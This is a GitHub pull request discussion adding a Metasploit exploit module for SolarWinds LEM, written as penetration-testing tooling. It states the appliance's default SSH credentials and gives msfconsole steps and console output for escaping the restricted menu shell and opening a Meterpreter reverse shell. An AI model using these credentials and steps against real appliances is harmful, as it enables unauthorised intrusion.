New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module SolarWind LEM Default SSH Password Remote Code Execution #8126

Merged
merged 5 commits into from Mar 31, 2017

Conversation

Projects
None yet
6 participants
@mmetince
Contributor

mmetince commented Mar 17, 2017

This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/ssh/solarwind_lem_exec
  • set RHOST <YOUR_TARGET>
  • python/meterpreter/reverse_tcp is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
  • set LHOST <LOCAL IP>
  • exploit and then verify the following output.
msf exploit(solarwind_lem_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.
  • session -i 1 and then verify the following output.
msf exploit(solarwind_lem_exec) > sessions -i 3 
[*] Starting interaction with 3...

meterpreter > getuid
Server username: cmc
meterpreter > 

Need backup!

Need your help in order to figure out why I'm getting Exploit failed: Errno::EBADF Bad file descriptorerror even session is created. There is also way to escalate privileges to root but all the function that I am calling through session such as cmd_exec or session.shell_command_token is not working at def on_new_session(session)

@dmohanty-r7

This comment has been minimized.

Contributor

dmohanty-r7 commented Mar 17, 2017

Exploit works as advertised for me:

msf > use exploit/linux/ssh/solarwind_lem_exec
msf exploit(solarwind_lem_exec) > set RHOST *.*.*.*
RHOST => *.*.*.*
msf exploit(solarwind_lem_exec) > set LHOST *.*.*.*
LHOST => *.*.*.*
msf exploit(solarwind_lem_exec) > exploit

[*] Started reverse TCP handler on *.*.*.*:4444
[*] *.*.*.*:32022 - Attempting to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to *.*.*.*
[*] Meterpreter session 1 opened (*.*.*.*:4444 -> *.*.*.*:59193) at 2017-03-17 16:47:17 -0500
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(solarwind_lem_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
meterpreter > ls
Listing: /usr/local/contego
===========================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100600/rw-------  371     fil   2017-03-17 16:47:17 -0500  .bash_history
100774/rwxrwxr--  176     fil   2016-08-19 07:13:49 -0500  .bash_profile
100774/rwxrwxr--  46      fil   2016-08-19 07:13:49 -0500  .bashrc
40755/rwxr-xr-x   4096    dir   2016-08-19 07:13:52 -0500  .oracle_jre_usage
100660/rw-rw----  1024    fil   2016-08-19 07:13:49 -0500  .rnd
100664/rw-rw-r--  0       fil   2016-08-19 07:13:49 -0500  banner.txt
42775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  database
100664/rw-rw-r--  2572    fil   2017-03-17 16:32:40 -0500  error.log
100664/rw-rw-r--  79508   fil   2017-03-17 16:32:44 -0500  hsql.log
40775/rwxrwxr-x   16384   dir   2016-08-19 07:13:52 -0500  lib
100664/rw-rw-r--  108605  fil   2017-03-17 16:48:47 -0500  manager.log
100664/rw-rw-r--  2183    fil   2017-03-17 16:47:17 -0500  mgrconfig.log
42775/rwxrwxr-x   4096    dir   2016-08-19 07:13:53 -0500  reset
42775/rwxrwxr-x   4096    dir   2017-03-17 16:32:55 -0500  run
42775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  scripts
40775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  tools

meterpreter >

Looking into Exploit failed: Errno::EBADF Bad file descriptor bug

@dmohanty-r7

This comment has been minimized.

Contributor

dmohanty-r7 commented Mar 17, 2017

It would probably be more appropriate to write this as an auxiliary login scanner much like auxiliary/scanner/ssh/ssh_login https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb, or auxiliary/scanner/ssh/ssh_login/karah_login https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/karaf_login.rb

Although, not sure, since you have the additional steps where you "break out of the jail".

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 17, 2017

@dmohanty-r7 I was planning go with auxiliary at the beginning but I decided to go with exploit module due to exploitation of menuing system vulnerability that actually helps us to reach terminal. If we managed to solve that bug, I would also add privileges escalation steps as well. Is it okey to create a session and then escalate privileges within same aux module ?

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Mar 17, 2017

@mmetince: Bro, you need to stop finding so many bugs. You're giving us too many modules. ;)

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Mar 21, 2017

I agree with @mmetince that having this as an exploit is perfectly fine. However, I would probably consider adding the default username and password to a wordlist in the data/wordlists directory, that way the ssh_login auxiliary can use it.

I think this PR is probably good to land as soon as there is some module documentation.

Nice work @mmetince & @dmohanty-r7 :-)

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 21, 2017

Should I add these credential to the data/wordlists within this PR or should I send another PR ? @wchen-r7

I just need @dmohanty-r7 to solve Exploit failed: Errno::EBADF Bad file descriptor issue before landing this one. I've spent almost a day on it but couldn't figured it out why we're getting this error.

mmetince added some commits Mar 23, 2017

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Mar 23, 2017

@mmetince Either way works fine :-) Whatever is easier for you :-)

@mmetince

This comment has been minimized.

Contributor

mmetince commented Mar 24, 2017

  • Adding module doc is done.
  • Adding credentials to the wordlist is done. Please verify that the added wordlist file is the proper one :-) ?

Now I just want to know a root cause of Exploit failed: Errno::EBADF Bad file descriptor error :-) Any news from @dmohanty-r7 ur side ?

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Mar 24, 2017

I'm working on it with @dmohanty-r7. Got some leads. :)

@h00die

This comment has been minimized.

Contributor

h00die commented Mar 25, 2017

btw, docs look good to me.

@dmohanty-r7 dmohanty-r7 merged commit e9f8162 into rapid7:master Mar 31, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

dmohanty-r7 added a commit that referenced this pull request Mar 31, 2017

@dmohanty-r7

This comment has been minimized.

Contributor

dmohanty-r7 commented Mar 31, 2017

@mmetince We wrapped the ssh.loop unless session_created? in a begin/rescue and logged the error. This produces expected behavior. Thank you so much for the module. Also thank you @h00die for the look over the docs ^.^

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Mar 31, 2017

🍰

@dmohanty-r7

This comment has been minimized.

Contributor

dmohanty-r7 commented Mar 31, 2017

Release Notes

The exploit/linux/ssh/solarwinds_lem_exec module has been added to the framework. It leverages the default SSH credentials of a SolarWind LEM appliance and uses command injection to break out of its defined jail.

@mmetince mmetince deleted the mmetince:solarwind_lem_exec branch Mar 31, 2017

@tdoan-r7 tdoan-r7 added the rn-exploit label Apr 4, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment